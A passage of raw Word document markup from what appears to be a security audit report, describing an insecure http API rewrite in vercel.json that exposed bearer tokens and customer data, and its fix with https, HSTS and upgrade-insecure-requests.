                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1806" style="position:absolute;width:5143;height:1333;left:41052;top:0;" coordsize="514351,133350" path="m9526,0l504826,0c507456,0,509701,930,511561,2791c513421,4638,514350,6890,514351,9525l514351,123825c514350,126448,513421,128687,511561,130547c509701,132407,507456,133338,504826,133350l9526,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,1,123825l1,9525c0,6890,930,4638,2790,2791c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1811" style="position:absolute;width:17430;height:1333;left:30194;top:1714;" coordsize="1743075,133350" path="m9525,0l1733550,0c1736180,0,1738425,930,1740285,2791c1742144,4651,1743074,6890,1743075,9525l1743075,123825c1743074,126448,1742144,128687,1740285,130547c1738425,132407,1736180,133338,1733550,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vercel.json</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:5</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rewrote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api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/:path</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to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http:// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pubudutyres.codexpress</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codes</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gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>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:1</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> used </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2E30C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>same host</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a downgrade, not a host lacking TLS. Every proxied request carries </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authorization: Bearer &lt;token</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;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so tokens, customer phone numbers and cost prices travelled one hop unencrypted. Because tokens never expired (V-06), a token captured once stayed valid indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794301A" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008D25BF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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49E38724" wp14:editId="18DCAB09">
                <wp:extent cx="6963788" cy="163752"/>
                <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                <wp:docPr id="27470" name="Group 27470"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6963788" cy="163752"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6963788" cy="163752"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1816" name="Rectangle 1816"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="8837"/>
                            <a:ext cx="271915" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="37F69C15" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>Fix.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1817" name="Rectangle 1817"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="204490" y="8837"/>
                            <a:ext cx="43855" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="36F95C3B"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1818" name="Shape 1818"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="238125" y="0"/>
                            <a:ext cx="523875" cy="133344"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="523875" h="133344">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="514350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="516980" y="0"/>
                                  <a:pt x="519225" y="930"/>
                                  <a:pt x="521085" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="522945" y="4638"/>
                                  <a:pt x="523875" y="6890"/>
                                  <a:pt x="523875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="523875" y="123819"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="523875" y="126448"/>
                                  <a:pt x="522945" y="128693"/>
                                  <a:pt x="521085" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="519225" y="132414"/>
                                  <a:pt x="516980" y="133344"/>
                                  <a:pt x="514350" y="133344"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133344"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123819"/>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19" name="Rectangle 1819"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="264468" y="23651"/>
                            <a:ext cx="620169" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0F0B2E17" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>https://</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1820" name="Rectangle 1820"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="757833" y="8837"/>
                            <a:ext cx="2140635" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="39B53B7F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> in the rewrite, plus HSTS and </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1821" name="Shape 1821"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2371725" y="0"/>
                            <a:ext cx="1504950" cy="133344"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1504950" h="133344">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1495425" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1498056" y="0"/>
                                  <a:pt x="1500300" y="930"/>
                                  <a:pt x="1502160" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1504020" y="4638"/>
                                  <a:pt x="1504950" y="6890"/>
                                  <a:pt x="1504950" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="123819"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1504950" y="126448"/>
                                  <a:pt x="1504020" y="128693"/>
                                  <a:pt x="1502160" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1500300" y="132414"/>
                                  <a:pt x="1498056" y="133344"/>
                                  <a:pt x="1495425" y="133344"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133344"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123819"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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22" name="Rectangle 1822"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2394347" y="23651"/>
                            <a:ext cx="1938028" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="536608B7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>upgrade-insecure-requests</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1823" name="Rectangle 1823"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3878461" y="8837"/>
                            <a:ext cx="3085327" cy="148374"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="39765939" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> in the new CSP as browser-side backstops.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="49E38724" id="Group 27470" o:spid="_x0000_s1261" style="width:548.35pt;height:12.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="69637,1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&#10;">
                <v:rect id="Rectangle 1816" o:spid="_x0000_s1262" style="position:absolute;top:88;width:271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37F69C15" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>Fix.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1817" o:spid="_x0000_s1263" style="position:absolute;left:2044;top:88;width:439;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36F95C3B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1818" o:spid="_x0000_s1264" style="position:absolute;left:2381;width:5239;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="523875,133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XjxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvk/YfIk/abaRwmKqOgBAS08RlAra71Zim0DhVktLy7+cD0m623vN7n5fryXfqRjG1gQ3MZwUo&#10;4jrYlhsDP6fdWwkqZWSLXWAycKcE69Xz0xIrG0Y+0O2YGyUhnCo04HLuK61T7chjmoWeWLRziB6z&#10;rLHRNuIo4b7Ti6J41x5blgaHPW0d1dfj4A0U43c7YO/ry9i4bij3i994+jTm9WXafIDKNOV/8+P6&#10;ywp+ORdc+UZG0Ks/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJltBePEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l514350,v2630,,4875,930,6735,2778c522945,4638,523875,6890,523875,9525r,114294c523875,126448,522945,128693,521085,130553v-1860,1861,-4105,2791,-6735,2791l9525,133344v-2630,,-4875,-930,-6735,-2791c930,128693,,126448,,123819l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,523875,133344"/>
                </v:shape>
                <v:rect id="Rectangle 1819" o:spid="_x0000_s1265" style="position:absolute;left:2644;top:236;width:6202;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0F0B2E17" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>https://</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1820" o:spid="_x0000_s1266" style="position:absolute;left:7578;top:88;width:21406;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39B53B7F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> in the rewrite, plus HSTS and </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
